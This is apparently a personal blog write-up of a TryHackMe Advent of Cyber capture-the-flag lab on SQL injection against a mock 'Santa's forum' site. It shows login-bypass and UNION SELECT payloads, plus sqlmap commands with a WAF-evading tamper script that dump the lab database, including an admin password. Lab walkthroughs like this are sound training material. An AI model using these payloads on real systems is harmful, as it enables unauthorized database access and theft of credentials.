TryHackMe — Advent of Cyber 2 — Day 5

Good afternoon all,

Caught a little nap after the late night shift and should be catching up on a few of the days at least..

Here is the intro for the machine for today:

“After last year’s attack, Santa and the security team have worked hard on reviving Santa’s personal portal. Hence, ‘Santa’s forum 2' went live.

After the attack, logs have revealed that someone has found Santa’s panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!”

Reading through the learning portion of the machine intro, we will be dealing with SQL Injection. This is good. Haven’t dealt with this in a while and usually I just took someone else’s command used the good ole’ copy pasta. Good chance to learn again.

They do let us know we can try the SQLi login bypass on port 3000, so I’ll play with that for a little bit to familiarize myself before embarrassing myself too much on here….

……

OK, back to it, question one, find the login page. (without brute forcing).. This one got me, I was going down the path of admin… login…. nothing. anyway, I used the hint:

“The name is derived out of 2 words from this question. /s**tap***l”

/santapanel was pretty easy to get out of the that..

Question 2: How many entries are there in the gift database?

If we add just a single quote ‘ we do receive a SQL error, this is good.

Doing a ‘ORDER BY’ attack, we can determine our current table is 2 columns, given it is a login form, this makes sense..

Let’s try and enumerate some usernames and passwords. Doing a ‘UNION SELECT username, password FROM users — gives us:

Not entirely sure what happened, I expected a table with usernames and passwords. Let’s keep playing around and keep this in mind. We got a session cookie from this, For now, I’m going to copy and paste the data and delete it.

Well, went back to the login page, and it appears it just evaluated to TRUE and logged me in, tested with a simple:

'OR 1=1 --

This got me logged into the same page as above, I guess lets try and enumerate from the his search box. An ‘ORDER BY’ operation will give us 2 columns in this case as well (confirmed by just enter ‘1’ into the search by, index/ID number for the row.

Anyhow, just playing around (used the example SQLi commands), I was able to extract the users database

Let’s get back to the questions..’How many entries are there in the gift database?’

'UNION SELECT * FROM users --

This wasn’t my goal, but I will take it as it answers our questions.. Didn’t expect the table to be called ‘users’ for the gifts..

I didn’t want to count all of those lines, would lose count on my fingers… pasted the data into a text doc and used

#wc -l gifts.txt

This counts our lines for us and gives us the answer to the question(minus the ‘admin:pass’ line), also in the table we have the answer to the next question: What did Paul ask for? AND this also answers the question: What is admin’s password?..

Anyhow we did our answers out of order, this leaves us with the question: What is the flag? So, where to begin with this one, For now, I will spare you the playing around with SQL screenshots until I come up with something…

….

Anyway, couldn’t figure it out, went ahead and captured a request with Burp, saved and sent it along to sqlmap. Also the hint mentions to just use this to dump the entire database.

#sqlmap -r day5sqlreq

First time came back with nothing.. I forgot that it mentioned they had install a WAF this year.. used the

--tamper=space2comment

Website used for reference: https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

Full command used for sqlmap:

#sqlmap -r day5sqlreq --tamper=space2comment --dbms=sqlite --tables

This gives us this when we enumerate for tables

Database: SQLite_masterdb
[3 tables]
+--------------+
| hidden_table |
| sequels |
| users |
+--------------+

Lets take a look inside the tables…

#sqlmap -r day5sqlreq --tamper=space2comment --dbms=sqlite -DSQLite_masterdb -T <TABLE_NAME> -dumpDatabase: SQLite_masterdb
Table: users
[1 entry]
+------------------+----------+
| password | username |
+------------------+----------+
| EhCNSWzzFP6sc7gB | admin |
+------------------+----------+
Database: SQLite_masterdb
Table: sequels
[22 entries]
+-------------+-----+----------------------------+
| kid | age | title |
+-------------+-----+----------------------------+
| James | 8 | shoes |
| John | 4 | skateboard |
| Robert | 17 | iphone |
| Michael | 5 | playstation |
| William | 6 | xbox |
| David | 6 | candy |
| Richard | 9 | books |
| Joseph | 7 | socks |
| Thomas | 10 | 10 McDonalds meals |
| Charles | 3 | toy car |
| Christopher | 8 | air hockey table |
| Daniel | 12 | lego star wars |
| Matthew | 15 | bike |
| Anthony | 3 | table tennis |
| Donald | 4 | fazer chocolate |
| Mark | 17 | wii |
| Paul | 9 | github ownership |
| James | 8 | finnish-english dictionary |
| Steven | 11 | laptop |
| Andrew | 16 | rasberry pie |
| Kenneth | 19 | TryHackMe Sub |
| Joshua | 12 | chair |
+-------------+-----+----------------------------+
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag |
+-----------------------------------------+
| thmfox{FLAG} |
+-----------------------------------------+

Yes, the flag is removed from above… as always, you must put in some work.. All in all, this was frustrating but fun, learned a bit about the Burp and SQLmap, always tried to avoid the tool since far as I recall, you can’t use it in the OSCP exam, but it is a hell of a tool, that is for sure. Anyhow, best of luck.

Until next time,

-3lduderino